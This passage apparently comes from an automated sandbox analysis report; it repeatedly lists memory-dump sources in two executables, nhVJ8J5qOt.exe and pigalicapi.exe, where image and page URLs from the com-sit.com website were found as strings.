00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/warenpruefung-lagerung/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/4.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/C1.png
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1024x222.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1536x334.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-300x65.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-768x167.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-150x150.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-300x300.png
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-150x150.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-300x300.png
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-150x150.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-300x300.png
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLACK-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLUE-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSKIN-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSTROKe-1.jpg
